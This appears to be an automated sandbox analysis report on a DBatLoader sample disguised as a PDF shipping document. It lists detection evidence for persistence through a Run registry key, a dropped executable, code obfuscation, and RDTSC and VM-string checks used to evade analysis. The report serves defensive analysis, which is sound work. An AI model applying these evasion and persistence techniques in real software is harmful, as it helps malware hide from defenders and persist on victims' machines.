Source:	Binary string: wntdll.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, Nyedvqj.exe, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp
Source:	Binary string: svchost.pdbUGP source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp

Data Obfuscation:

Yara detected DBatLoader

Source: Yara match	File source: 0000000E.00000002.341748115.00000000023CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.322398539.00000000009FA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.299172533.0000000000B1A000.00000004.00000001.sdmp, type: MEMORY

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Unpacked PE file: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Unpacked PE file: 17.2.Nyedvqj.exe.400000.0.unpack .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Unpacked PE file: 18.2.Nyedvqj.exe.400000.0.unpack .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03821BF0 push ebx; retf	1_3_03821BF1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826691 push 00000066h; retf	1_3_03826696
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038266F9 push ebp; ret	1_3_038266FA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826629 push esi; iretd	1_3_0382662B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822655 push ebp; ret	1_3_03822656
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822585 push esi; iretd	1_3_03822587
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038225ED push 00000066h; retf	1_3_038225F2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03823DFC pushfd ; ret	1_3_03823DFD
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826528 push esi; ret	1_3_0382654C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822484 push esi; ret	1_3_038224A8
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03825C94 push ebx; retf	1_3_03825C95
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038238C8 push edi; ret	1_3_038238C9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03821BF0 push ebx; retf	1_3_03821BF1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826691 push 00000066h; retf	1_3_03826696
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038266F9 push ebp; ret	1_3_038266FA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826629 push esi; iretd	1_3_0382662B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822655 push ebp; ret	1_3_03822656
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822585 push esi; iretd	1_3_03822587
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038225ED push 00000066h; retf	1_3_038225F2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03823DFC pushfd ; ret	1_3_03823DFD
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03826528 push esi; ret	1_3_0382654C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03822484 push esi; ret	1_3_038224A8
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_03825C94 push ebx; retf	1_3_03825C95
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 1_3_038238C8 push edi; ret	1_3_038238C9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041B832 push eax; ret	11_2_0041B838
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041B83B push eax; ret	11_2_0041B8A2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041B89C push eax; ret	11_2_0041B8A2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00415D38 push es; retf	11_2_00415D8B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041CDC5 push es; ret	11_2_0041CDC6
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041A5BB pushfd ; ret	11_2_0041A5BC
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041B7E5 push eax; ret	11_2_0041B838

Persistence and Installation Behavior:

Creates processes with suspicious names

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	File created: \original shipment doc ref 2853801324189923,pdf.exe
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	File created: \original shipment doc ref 2853801324189923,pdf.exe			Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

File created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Nyedvqj			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Nyedvqj			Jump to behavior

Source: C:\Windows\SysWOW64\netsh.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000000BD8604 second address: 0000000000BD860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002B28604 second address: 0000000002B2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000000BD899E second address: 0000000000BD89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002B2899E second address: 0000000002B289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000D68604 second address: 0000000000D6860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000D6899E second address: 0000000000D689A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 4472	Thread sleep time: -35000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2940	Thread sleep time: -34000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\netsh.exe

Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Code function: 11_2_004088D0 rdtsc

11_2_004088D0

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: explorer.exe, 0000000D.00000000.342756318.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.298968913.00000000007C2000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000C.00000002.322309602.00000000007DB000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000E.00000002.341331996.00000000006DB000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000D.00000000.343112682.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}""
Source: explorer.exe, 0000000D.00000000.325727798.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 0000000D.00000000.343112682.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000000D.00000000.329523937.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: Nyedvqj.exe, 0000000E.00000002.341331996.00000000006DB000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW,
Source: explorer.exe, 0000000D.00000000.343112682.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 0000000D.00000000.313224825.000000000DCB9000.00000004.00000001.sdmp	Binary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Code function: 11_2_004088D0 rdtsc

11_2_004088D0

Enables debug privileges

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug	Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBF0BF mov ecx, dword ptr fs:[00000030h]	11_2_00BBF0BF
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBF0BF mov eax, dword ptr fs:[00000030h]	11_2_00BBF0BF
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBF0BF mov eax, dword ptr fs:[00000030h]	11_2_00BBF0BF
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov ecx, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC90AF mov eax, dword ptr fs:[00000030h]	11_2_00BC90AF
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89080 mov eax, dword ptr fs:[00000030h]	11_2_00B89080
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C03884 mov eax, dword ptr fs:[00000030h]	11_2_00C03884
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C03884 mov eax, dword ptr fs:[00000030h]	11_2_00C03884
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B858EC mov eax, dword ptr fs:[00000030h]	11_2_00B858EC
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]	11_2_00B9B02A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]	11_2_00B9B02A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]	11_2_00B9B02A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]	11_2_00B9B02A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]	11_2_00BB002D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]	11_2_00BB002D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]	11_2_00BB002D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]	11_2_00BB002D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]	11_2_00BB002D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C51074 mov eax, dword ptr fs:[00000030h]	11_2_00C51074
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C42073 mov eax, dword ptr fs:[00000030h]	11_2_00C42073
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C54015 mov eax, dword ptr fs:[00000030h]	11_2_00C54015
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C54015 mov eax, dword ptr fs:[00000030h]	11_2_00C54015
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C07016 mov eax, dword ptr fs:[00000030h]	11_2_00C07016
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C07016 mov eax, dword ptr fs:[00000030h]	11_2_00C07016
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C07016 mov eax, dword ptr fs:[00000030h]	11_2_00C07016
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA0050 mov eax, dword ptr fs:[00000030h]	11_2_00BA0050
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA0050 mov eax, dword ptr fs:[00000030h]	11_2_00BA0050
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB61A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB61A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB61A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB61A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C141E8 mov eax, dword ptr fs:[00000030h]	11_2_00C141E8
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB2990 mov eax, dword ptr fs:[00000030h]	11_2_00BB2990
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BAC182 mov eax, dword ptr fs:[00000030h]	11_2_00BAC182
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBA185 mov eax, dword ptr fs:[00000030h]	11_2_00BBA185
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]	11_2_00B8B1E1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]	11_2_00B8B1E1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]	11_2_00B8B1E1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C069A6 mov eax, dword ptr fs:[00000030h]	11_2_00C069A6
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]	11_2_00C051BE
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]	11_2_00C051BE
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]	11_2_00C051BE
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]	11_2_00C051BE
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB513A mov eax, dword ptr fs:[00000030h]	11_2_00BB513A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB513A mov eax, dword ptr fs:[00000030h]	11_2_00BB513A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120 mov ecx, dword ptr fs:[00000030h]	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89100 mov eax, dword ptr fs:[00000030h]	11_2_00B89100
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89100 mov eax, dword ptr fs:[00000030h]	11_2_00B89100
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89100 mov eax, dword ptr fs:[00000030h]	11_2_00B89100
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8B171 mov eax, dword ptr fs:[00000030h]	11_2_00B8B171
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8B171 mov eax, dword ptr fs:[00000030h]	11_2_00B8B171
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8C962 mov eax, dword ptr fs:[00000030h]	11_2_00B8C962
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BAB944 mov eax, dword ptr fs:[00000030h]	11_2_00BAB944
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BAB944 mov eax, dword ptr fs:[00000030h]	11_2_00BAB944
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]	11_2_00B9AAB0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]	11_2_00B9AAB0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBFAB0 mov eax, dword ptr fs:[00000030h]	11_2_00BBFAB0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]	11_2_00B852A5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]	11_2_00B852A5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]	11_2_00B852A5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]	11_2_00B852A5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]	11_2_00B852A5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBD294 mov eax, dword ptr fs:[00000030h]	11_2_00BBD294
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBD294 mov eax, dword ptr fs:[00000030h]	11_2_00BBD294
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB2AE4 mov eax, dword ptr fs:[00000030h]	11_2_00BB2AE4
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB2ACB mov eax, dword ptr fs:[00000030h]	11_2_00BB2ACB
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC4A2C mov eax, dword ptr fs:[00000030h]	11_2_00BC4A2C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC4A2C mov eax, dword ptr fs:[00000030h]	11_2_00BC4A2C
